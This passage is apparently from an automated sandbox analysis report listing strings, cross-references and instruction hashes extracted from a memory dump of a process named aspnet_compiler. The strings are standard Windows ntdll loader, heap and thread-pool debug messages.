                                                                                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 010C3437
                                                                                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 010C3456
                                                                                                                                                          • RtlDeactivateActivationContext, xrefs: 010C3425, 010C3432, 010C3451
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                          Strings
                                                                                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 010B106B
                                                                                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010B10AE
                                                                                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 010B1028
                                                                                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 010B0FE5
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                          Strings
                                                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 010C3640, 010C366C
                                                                                                                                                          • LdrpFindDllActivationContext, xrefs: 010C3636, 010C3662
                                                                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 010C365C
                                                                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 010C362F
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                          Strings
                                                                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 010BA992
                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010BA9A2
                                                                                                                                                          • apphelp.dll, xrefs: 01072462
                                                                                                                                                          • LdrpDynamicShimModule, xrefs: 010BA998
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                          Strings
                                                                                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0106327D
                                                                                                                                                          • HEAP[%wZ]: , xrefs: 01063255
                                                                                                                                                          • HEAP: , xrefs: 01063264
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $@
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 010BA10F
                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010BA121
                                                                                                                                                          • LdrpCheckModule, xrefs: 010BA117
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                          Strings
                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010C82E8
                                                                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 010C82D7
                                                                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 010C82DE
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                          Strings
                                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0110C1C5
                                                                                                                                                          • @, xrefs: 0110C1F1
                                                                                                                                                          • PreferredUILanguages, xrefs: 0110C212
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                          Strings
                                                                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 010D4888
                                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 010D4899
                                                                                                                                                          • LdrpCheckRedirection, xrefs: 010D488F
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                          Strings
                                                                                                                                                          • LdrpInitializationFailure, xrefs: 010D20FA
                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010D2104
                                                                                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 010D20F3
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                          • String ID: #%u
                                                                                                                                                          Strings
                                                                                                                                                          • LdrResSearchResource Enter, xrefs: 0105AA13
                                                                                                                                                          • LdrResSearchResource Exit, xrefs: 0105AA25
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: `$`
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: Legacy$UEFI
                                                                                                                                                          • API String ID: 2994545307-634100481
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: @$MUI
                                                                                                                                                          • API String ID: 0-17815947
                                                                                                                                                          Strings
                                                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0105063D
                                                                                                                                                          • kLsE, xrefs: 01050540
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                          • API String ID: 0-2547482624
                                                                                                                                                          Strings
                                                                                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0105A2FB
                                                                                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0105A309
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                          • API String ID: 0-2876891731
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                                                                                          • API String ID: 2994545307-4008356553
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: MUI
                                                                                                                                                          • API String ID: 0-1339004836
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: GlobalTags
                                                                                                                                                          • API String ID: 0-1106856819
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: .mui
                                                                                                                                                          • API String ID: 0-1199573805
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: EXT-
                                                                                                                                                          • API String ID: 0-1948896318
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: BinaryHash
                                                                                                                                                          • API String ID: 0-2202222882
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: #
                                                                                                                                                          • API String ID: 0-1885708031
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: BinaryName
                                                                                                                                                          • API String ID: 0-215506332
                                                                                                                                                          Strings
                                                                                                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 010D895E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                          • API String ID: 0-702105204
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                          • Instruction ID: e20444d6d62bd018bad7311532f5ee68aa233e82268849c770bc0330997696bd
                                                                                                                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                          • Instruction Fuzzy Hash: 1CB1C631A04646AFDB15DB68C890BFEBBFAAF44300F140195E6D6DB286D730EE41CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 483f635cef1dce2c793ea0e69b9f3399f36b18b2c39ea1542312986a0f549059
                                                                                                                                                          • Instruction ID: 46392016f6ad78f6e6ccdbe2f3ed56721df5c007ae11c049baa239459657460a
                                                                                                                                                          • Opcode Fuzzy Hash: 483f635cef1dce2c793ea0e69b9f3399f36b18b2c39ea1542312986a0f549059
                                                                                                                                                          • Instruction Fuzzy Hash: 14C149741083418FD7A4CF19C494BABB7E5BF88308F44896EE9D987291DB74E909CF92
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 54bcf169a7bb73cd1abbfa7c894b1e61ee092530ab74aeca0dbdba08b76180f8
                                                                                                                                                          • Instruction ID: 3680e630931b116038173d407adbfa03a68763a83d21383eeb0cc14c7ed4d26d
                                                                                                                                                          • Opcode Fuzzy Hash: 54bcf169a7bb73cd1abbfa7c894b1e61ee092530ab74aeca0dbdba08b76180f8
                                                                                                                                                          • Instruction Fuzzy Hash: BCB17370B002558BEB64DF68C990BADB3F5EF44700F0485E9D58AE7291DB319DC5CB60
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: eadc5fd82dfa71720216698471420563833293d68bdcaf0c122e72dd814955ff
                                                                                                                                                          • Instruction ID: 95aa13ca629ed596b8698c8899c4ff3d3c31fff8b9d0c9b31c0c2da1bdeca651
                                                                                                                                                          • Opcode Fuzzy Hash: eadc5fd82dfa71720216698471420563833293d68bdcaf0c122e72dd814955ff
                                                                                                                                                          • Instruction Fuzzy Hash: 27A12431E0125AAFEB21DB58CD84BEEBBF4BB04754F0401A5EAD0AB291D7749D80CBD5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 454be43a55d938da6a975ea56e8560a638cac5cdf44fad72805f36eb794fd16a
                                                                                                                                                          • Instruction ID: 114b17e82c43971de432ddc1fdc9d99b5ad4ac06a183cbe1c4fdb5094be24718
                                                                                                                                                          • Opcode Fuzzy Hash: 454be43a55d938da6a975ea56e8560a638cac5cdf44fad72805f36eb794fd16a
                                                                                                                                                          • Instruction Fuzzy Hash: 50A1E1B0B00616DBDF64DF69C8A0BAEB7F9FF54718F004069EA9597285DB34E841DB80
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 65a0d9b0c067ca4ff06b4620d110f3967ec552c75f5c72b6e1954f0aa322d09a
                                                                                                                                                          • Instruction ID: 842b9a25dae0c22c8b72762d507a9bb97fffeb2f18696107c58a62e3b2f5439f
                                                                                                                                                          • Opcode Fuzzy Hash: 65a0d9b0c067ca4ff06b4620d110f3967ec552c75f5c72b6e1954f0aa322d09a
                                                                                                                                                          • Instruction Fuzzy Hash: 15A1F172A10622EFD729DF58C980B6AB7E9FF48708F050528F599DBA51C370EC60CB91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0c7673d32ce0105f448cef8626da8c8ee78ff3c58d7fc8aa8fee1cdcf712b98d
                                                                                                                                                          • Instruction ID: 496863a8f247c64921a8b80ce8e824615344a88d42c1da0ea36b55ffbf1c2597
                                                                                                                                                          • Opcode Fuzzy Hash: 0c7673d32ce0105f448cef8626da8c8ee78ff3c58d7fc8aa8fee1cdcf712b98d
                                                                                                                                                          • Instruction Fuzzy Hash: 8891B271D0031AAFDB15CFA8D894BBEBBB5AF48710F154169E690AB341D736E9008FA4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 33300b081e4afafc7931537edc3932e3e2639f0cf7b51b5e4c1b0e99c7a5897c
                                                                                                                                                          • Instruction ID: 8f039fa801373609bd24908a9863513e6d5663f34a6e7843a7ebfd4b0dbe1e2e
                                                                                                                                                          • Opcode Fuzzy Hash: 33300b081e4afafc7931537edc3932e3e2639f0cf7b51b5e4c1b0e99c7a5897c
                                                                                                                                                          • Instruction Fuzzy Hash: 28910579A00716CBDB24DB6CC480BBDBBE9EB94718F1540A5EA859B280EB34DD41C791
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e0cf9c8035e2493f6736b2c18835caa477def114dab45dba918424cc6e3a57d7
                                                                                                                                                          • Instruction ID: 02ffd03b7368d6cf514666b0494897d3f4ad6fd7d802a9980c47467a73cf2b26
                                                                                                                                                          • Opcode Fuzzy Hash: e0cf9c8035e2493f6736b2c18835caa477def114dab45dba918424cc6e3a57d7
                                                                                                                                                          • Instruction Fuzzy Hash: 3D81A271E006199BDB24CFA9C950AFEBBF9FB48700F18852EE485D7640E735D980CB94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                          • Instruction ID: db228fc5359b3e827ef0227386a227adef0a4428babcca76e562d3d570f31611
                                                                                                                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                          • Instruction Fuzzy Hash: 80819F31A0164A9FDF1DCF98D890AAEFBB6BF84310F198579D9169B349D734E901CB80
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c14fb176da7ea2235d070b520cb3e18ac3d06a62c39468acecbfbc238fe00146
                                                                                                                                                          • Instruction ID: 45516dbc22b1b30ca22e43602441736e743718ef459aa4303bcc7f4286ee579d
                                                                                                                                                          • Opcode Fuzzy Hash: c14fb176da7ea2235d070b520cb3e18ac3d06a62c39468acecbfbc238fe00146
                                                                                                                                                          • Instruction Fuzzy Hash: 2571E2757047069BDB21DF98C980B6BB7E8FB44358F818969EAD5C7200E330E884CBD2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b8e867fab0f1d55c0eb983bf79c5f384ba55cc86138dfa0f9b1890e0a77c39f6
                                                                                                                                                          • Instruction ID: 3297ccbdf45321925d7ac1d36d0d91f65df539fa9f4b567ba18bb3bbf019dc5c
                                                                                                                                                          • Opcode Fuzzy Hash: b8e867fab0f1d55c0eb983bf79c5f384ba55cc86138dfa0f9b1890e0a77c39f6
                                                                                                                                                          • Instruction Fuzzy Hash: A3816D71A04609EFDB25DFA9C880AEEBBF9FF48754F10842DE595A7250DB30AC45CB60
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 633c49e475e190d2e690edbdbc16e88973139832f5e2cb26faf3d08b5e55dbc2
                                                                                                                                                          • Instruction ID: d58c594ad79653366bea4c621021abb953c445dc8efb36a42269d58f86c0abc7
                                                                                                                                                          • Opcode Fuzzy Hash: 633c49e475e190d2e690edbdbc16e88973139832f5e2cb26faf3d08b5e55dbc2
                                                                                                                                                          • Instruction Fuzzy Hash: 4141D4757442059BDF39FF68A881FAE37B4AB59B08F00007DE9D29B341DB7298918B60
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                          • Instruction ID: 10f3b15cd3b3dd032903c047b678ce3e8a2c6cc0ef399e9635f0782a7257504d
                                                                                                                                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                          • Instruction Fuzzy Hash: 5B4109326057569FD72DCF68E980A6AFBA9FF80214B05463EE95287248EB30FD14C7D1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 41e2c06c3b0360094077733df819aa6f8b686eb4dc8739588d9f0bc1ec085f26
                                                                                                                                                          • Instruction ID: f5c601e4bb3fc622865ab168ccf1fc936d3a551265501d0e718513e01d1192a3
                                                                                                                                                          • Opcode Fuzzy Hash: 41e2c06c3b0360094077733df819aa6f8b686eb4dc8739588d9f0bc1ec085f26
                                                                                                                                                          • Instruction Fuzzy Hash: 5D41CC36904219DBDB14EF98C440AEEB7B4BF48710F1482AAF895F7344D7359D49CBA4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 50d46b5d3f422a3937382d8459957774a11f41d70a27226b8320c772110b3b1b
                                                                                                                                                          • Instruction ID: a710a5281cde5db84a7e8177f35861738ac027b92b08936a16a4fa17fd2ca57a
                                                                                                                                                          • Opcode Fuzzy Hash: 50d46b5d3f422a3937382d8459957774a11f41d70a27226b8320c772110b3b1b
                                                                                                                                                          • Instruction Fuzzy Hash: D041E5756013068FD724EF28C880AABB7E9FF88224F0049BAE5D7C7611DB31E845CB55
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                          • Instruction ID: abcbee3a219fd29a2c8ea89f5fac3fffe408cb253624bf98db4b046f0e3ac518
                                                                                                                                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
